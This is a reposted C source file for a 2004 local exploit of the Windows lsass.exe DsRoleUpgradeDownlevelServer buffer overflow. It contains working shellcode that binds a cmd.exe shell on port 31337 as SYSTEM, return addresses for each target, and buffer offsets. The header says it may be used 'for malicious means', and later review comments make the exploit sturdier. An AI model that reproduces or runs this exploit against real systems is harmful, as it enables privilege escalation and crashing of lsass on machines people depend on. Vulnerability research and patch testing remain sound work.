Microsoft Windows lsass.exe local exploit
来源:vfocus.net 作者:Assassin 发布时间:2004-04-26  

/*

Billybastard.c !!!!

The following is working code to exploit the lsass.exe flaw
discovered by eEye. This is the local version of the exploit. I will
release a remote version if someone pays me;) Use at your free will,
to test for the vulnerability or for malicious means. I do not give a
fuck.

Greetz: Dayle, Sc, breezah, RaFa, netmaniac, nightforce, prog, illmob group
and everyone else i forgot to mention.

Big thanks to netmaniac for hints on the undocumented api and making me
aware of the bug etc.

Obstacles encountered during developing the code:

The biggest problem was probably the fact that the area pointed to
by ESP was actually a very limited place where we had control of
(8 bytes, to be precise). There is no way decent shellcode would
fit into it. So what I did was relocate my shellcode elsewhere in
the buffer and use a small stub that jumps backwards into the place
where the shellcode was located. I also had to make
sure the registers were kept intact and cleaned up but this was not
a problem.

--------------

C:\Documents and Settings\ronan>nc 127.0.0.1 31337

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

----------------

Coded by Hi_Tech_Assassin

date: 15/4/04

*/

#include <windows.h>   /* first: declares HMODULE/FARPROC/RPC_STATUS and the Rpc*/LoadLibrary APIs */

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* memset/memcpy; previously reached only indirectly through windows.h */

#pragma comment(lib,"rpcrt4.lib")   /* RpcStringBindingCompose / RpcStringFree */

/* Library and export through which the overflow buffer reaches lsass.exe. */
#define NET_LIB "netapi32.dll"
#define NET_LIB_FUNC "DsRoleUpgradeDownlevelServer"

/* Size of the overflow buffer, and the fill byte (x86 NOP) used for the sled. */
enum
{
    BUFSIZE = 2000,
    NOP = 0x90
};

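/*
 * Target table: one row per platform the author built the exploit for.
 *
 *   targetNo  1-based number the user passes on the command line.
 *   platform  label printed by Usage().
 *   jmpAddr   return address written into the overflow buffer by main()
 *             (4 bytes on Win32; main() stores it as little-endian bytes).
 *
 * The table ends with an all-zero row (targetNo == 0); Usage() and main()
 * rely on that terminator.  The original terminator was {NULL}, which
 * initialises an int from a pointer constant -- a warning on MSVC/GCC and
 * an error on newer compilers -- so it is now spelled out as zeros.
 */
struct targets
{
    int targetNo;
    char platform[40];
    long jmpAddr;

} target[]=
{
    {1,"win xp(sp1 all patches) kernel32.dll", 0x77E9AE59}, /* tested by the author */
    {2,"win2k(all)", 0x0018759F},                            /* untested */
    {3,"crash", 0xffffffff},  /* deliberately invalid address; per its label this only crashes lsass.exe */
    {0, "", 0}                /* terminator */
};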

/*
 * Payload copied to offset 160 of the overflow buffer by main().
 *
 * The first few instructions (commented inline) move the stack pointer
 * 0x90 bytes below its current value before the payload proper runs --
 * presumably so the payload's own pushes cannot land on the code it is
 * executing (TODO confirm against a disassembly).  The remainder is
 * opaque, position-dependent x86 machine code: it embeds the string
 * "WS2_32.DLL" and pushes "\cmd.exe" as two dwords, and the transcript
 * in the header shows a shell reached with nc on port 31337.
 *
 * Constraints a maintainer must respect:
 *   - copy it byte-for-byte; nothing here may be "tidied";
 *   - it must stay free of 0x00 bytes, because main() measures it
 *     with strlen() before the memcpy.
 */
char shellcode[] =

"\x90"
"\x8B\xEC" /* mov ebp, esp */
"\xB0\x90" /* mov al, 90h */
"\x2B\xE0" /* sub esp, eax   -- drop the stack 0x90 bytes */
"\x90\x90\x90" /* padding */

"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

/* Print the program banner (one line, preceded and followed by a newline). */
void Banner(void)
{
    fputs("\nBillybastard (local lsass ownage exploit)\n", stdout);
}

/*
 * Print the command-line syntax followed by the numbered target list.
 * Walks the global target[] table up to its all-zero terminator row.
 */
void Usage(void)
{
    const struct targets *row;

    printf("\nUsage:\n\n Billybastard <target no>\n\nTargets\n\n");
    for (row = target; row->targetNo != 0; row++)
    {
        printf("[%d] - %s\n", row->targetNo, row->platform);
    }
    printf("\nCoded by: Hi Tech Assassin\n");
}

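/*
 * Entry point.  argv[1] selects a row of target[] (1-based).  Builds the
 * overflow buffer and hands it to netapi32!DsRoleUpgradeDownlevelServer;
 * that stub carries the request over the local \pipe\lsarpc endpoint into
 * lsass.exe, where the overflow happens (see the header comment).
 *
 * Returns 0 after the call (or when printing usage), 1 when the target
 * number is invalid or a setup step fails.
 *
 * Buffer layout (BUFSIZE bytes, pre-filled with NOP):
 *   [160 ..]       shellcode, NOP sled on both sides
 *   [1964..1967]   target[].jmpAddr, little-endian (the return address
 *                  that gets overwritten)
 *   [1980..1986]   "\x66\x81\xEC\x1C\x07\xFF\xE4" = sub sp,0x71C ; jmp esp
 *                  1980 - 0x71C == 160, i.e. it jumps back to the shellcode
 * The offsets were found empirically for the listed targets; change them
 * together or not at all.
 *
 * Operational caveats: a successful run leaves a listener accepting
 * connections as SYSTEM (the header transcript uses 127.0.0.1:31337 --
 * whether it is bound to loopback only is not established by this file);
 * a failed run or target 3 kills lsass.exe, which typically forces a
 * reboot.  Run only on an isolated test VM.
 */
int main(int argc, char **argv)
{
    enum { SHELLCODE_OFF = 160, RET_OFF = 1964, STUB_OFF = 1980 };

    HMODULE hNetLib = NULL;
    FARPROC NetLibFunc = NULL;

    char junk[]="\xee\xee\xee";

    /* sub sp,0x71C ; jmp esp -- lands on the shellcode at offset 160 */
    char strAsmSex[]="\x66\x81\xEC\x1C\x07\xFF\xE4";

    char strBigBuffer[BUFSIZE];
    long sel = 0;
    int ntargets = 0;
    char *end = NULL;
    unsigned long jmpAddr;

    unsigned char * pszUuid = NULL;
    unsigned char * pszProtocolSequence = (unsigned char *)"ncacn_np";
    unsigned char * pszNetworkAddress = NULL;
    unsigned char * pszEndpoint = (unsigned char *)"\\pipe\\lsarpc";
    unsigned char * pszOptions = NULL;
    unsigned char * pszStringBinding = NULL;

    RPC_STATUS rpcStatus;
    int rc = 1;

    Banner();

    if (argc != 2)
    {
        Usage();
        return 0;
    }

    /* Count the table so the selection can be range-checked.  The original
     * did atoi(argv[1]) - 1 unchecked, so "0" or "9" indexed outside
     * target[] and read a garbage jmpAddr. */
    while (target[ntargets].targetNo != 0)
    {
        ntargets++;
    }

    sel = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || sel < 1 || sel > ntargets)
    {
        printf("[x] Invalid target number '%s'\n", argv[1]);
        Usage();
        return 1;
    }
    jmpAddr = (unsigned long)target[sel - 1].jmpAddr;

    /* NOTE(review): the composed string binding is never turned into a
     * binding handle, so this only checks that the RPC runtime is usable;
     * the actual request is issued by the netapi32 stub below.  Kept so
     * the program's output and failure behaviour are unchanged. */
    rpcStatus=RpcStringBindingCompose(pszUuid,
                                      pszProtocolSequence,
                                      pszNetworkAddress,
                                      pszEndpoint,
                                      pszOptions,
                                      &pszStringBinding);
    if (rpcStatus)
    {
        printf("rpcbind error\n");
        return 1;
    }

    printf("rpcbind success!\n");

    hNetLib = LoadLibrary(NET_LIB);
    if (hNetLib == NULL)
    {
        printf("[x] Error loadin' library %s\n Exitin'...\n",NET_LIB);
        goto cleanup;
    }

    /* The original cast the result to HANDLE and never checked it; a NULL
     * here (export missing on this build) was a NULL function-pointer call. */
    NetLibFunc = GetProcAddress(hNetLib,NET_LIB_FUNC);
    if (NetLibFunc == NULL)
    {
        printf("[x] %s not found in %s\n Exitin'...\n", NET_LIB_FUNC, NET_LIB);
        goto cleanup;
    }

    memset(strBigBuffer, NOP, BUFSIZE);

    /* sizeof-1 equals strlen() here because neither literal contains 0x00;
     * it also avoids a silent short copy should that ever change. */
    memcpy(strBigBuffer + SHELLCODE_OFF, shellcode, sizeof shellcode - 1);
    memcpy(strBigBuffer + STUB_OFF, strAsmSex, sizeof strAsmSex - 1);

    /* Store the return address as four little-endian bytes.  The original
     * *(long *)&strBigBuffer[1964] = ... relied on long being 4 bytes and
     * on an aligned, type-punned write into a char array. */
    strBigBuffer[RET_OFF + 0] = (char)(jmpAddr & 0xff);
    strBigBuffer[RET_OFF + 1] = (char)((jmpAddr >> 8) & 0xff);
    strBigBuffer[RET_OFF + 2] = (char)((jmpAddr >> 16) & 0xff);
    strBigBuffer[RET_OFF + 3] = (char)((jmpAddr >> 24) & 0xff);

    /* NOTE(review): strBigBuffer carries no terminator -- every byte is
     * NOP, payload or address -- so whatever the stub uses to measure the
     * string runs past the array into whatever follows it on the stack;
     * the overflow length is therefore not fixed by this code.  The layout
     * was tuned empirically, so it is left as-is rather than terminated. */
    NetLibFunc(strBigBuffer,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk);
    rc = 0;

cleanup:
    if (hNetLib != NULL)
    {
        FreeLibrary(hNetLib);
    }
    RpcStringFree(&pszStringBinding);

    return rc;
}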



 